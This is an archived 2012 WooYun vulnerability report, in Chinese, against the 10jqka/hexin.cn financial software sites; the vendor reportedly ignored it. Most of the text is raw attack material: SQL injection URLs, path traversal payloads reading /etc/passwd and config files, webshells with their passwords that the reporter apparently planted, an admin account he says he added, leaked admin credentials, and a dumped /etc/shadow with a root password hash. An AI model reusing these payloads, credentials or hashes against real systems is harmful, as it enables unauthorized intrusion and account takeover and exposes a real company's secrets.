乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2012-03-26: 细节已通知厂商并且等待厂商处理中 2012-03-31: 厂商已经主动忽略漏洞,细节向公众公开
曾经向贵站检测许久,现在把贵站安全不足的地方汇报给你们.
http://www.10jqka.com.cn/modules.php?name=Downloads&d_op=viewdownload&cid=44%20and%201=1 注入http://dl.hexin.cn/admin/index.htmlHackerEnd 123456 (我加的账户)贵站这个后台javascript没有最好验证,还有php后台注入 http://dl.hexin.cn/admin/mes_admin.php?do=soft_up&id=408%20and%20user%3E0http://dl.hexin.cn/dlnew/accept_ver_new.php_bakhttp://dl.hexin.cn/http://wapdx.hexin.cn/config/config.inihttp://dl.hexin.cn/admin/index.html敏感泄露http://ns2.10jqka.com.cn/upload/oday.php一句话 woainichang 这个上传没验证好http://t.hexin.cn/download/pas$log.txthttp://t.hexin.cn/phpinfo.php 一句话 woainichang- -这个是任意下载漏洞呢http://wapyd.hexin.cn/dlarea_t/download_web.php?fn=../../../../../../etc/passwd&bid=3864&bname=%CD%A8%D3%C3%C7%F8&seid=1229&sename=Android&mid=1946%27&mname=Gpad&adv=http://wapyd.hexin.cn/dlarea_t/download_web.php?fn=../global.php&bid=3864&bname=%CD%A8%D3%C3%C7%F8&seid=1229&sename=Android&mid=1946%27&mname=Gpad&adv=http://t.hexin.cn/dlxhtml/download.php?fn=../download/xx.php&bid=1&bname=%E9%80%9A%E7%94%A8%E5%8C%BA&mid=1919&mname=WM6.0%E5%8F%8A%E4%BB%A5%E4%B8%8Ahttp://wapdx.hexin.cn/manager/admin H10EjXqIkNahexin 10HjEqXkIaN [email protected] http://mobile.10jqka.com.cn/main/admin/adv_img.php后台各种http://210.51.244.176/etc/shadow
root:$1$AnxEGPi8$Upiz.3ZRFVGeS2vj9ny7o/:14680:0:99999:7::: bin:*:14680:0:99999:7::: daemon:*:14680:0:99999:7::: adm:*:14680:0:99999:7::: lp:*:14680:0:99999:7::: sync:*:14680:0:99999:7::: shutdown:*:14680:0:99999:7::: halt:*:14680:0:99999:7::: mail:*:14680:0:99999:7::: news:*:14680:0:99999:7::: uucp:*:14680:0:99999:7::: operator:*:14680:0:99999:7::: games:*:14680:0:99999:7::: gopher:*:14680:0:99999:7::: ftp:*:14680:0:99999:7::: nobody:*:14680:0:99999:7::: vcsa:!!:14680:0:99999:7::: rpc:!!:14680:0:99999:7::: mailnull:!!:14680:0:99999:7::: smmsp:!!:14680:0:99999:7::: nscd:!!:14680:0:99999:7::: pcap:!!:14680:0:99999:7::: ntp:!!:14680:0:99999:7::: dbus:!!:14680:0:99999:7::: avahi:!!:14680:0:99999:7::: xfs:!!:14680:0:99999:7::: rpcuser:!!:14680:0:99999:7::: nfsnobody:!!:14680:0:99999:7::: sshd:!!:14680:0:99999:7::: haldaemon:!!:14680:0:99999:7::: avahi-autoipd:!!:14680:0:99999:7::: sabayon:!!:14680:0:99999:7:::
这个我很无语
http://mobile.10jqka.com.cn/main/dlquery_s.php?bid=3864&bname=%CD%A8%D3%C3%C7%F8&seid=1229&sename=Android&mid=1946&mname=Gpad&tyid=2705曾经 root 4.x MYSQl版本 没gpc ~
自己看看就知道了。
php很多程序都是 2008-2010的安全技术 缺陷很多,请贵站请安全人员去维护吧。有问题联系我邮箱 [email protected]
危害等级:无影响厂商忽略
忽略时间:2012-03-31 14:21
2012-04-17:已更改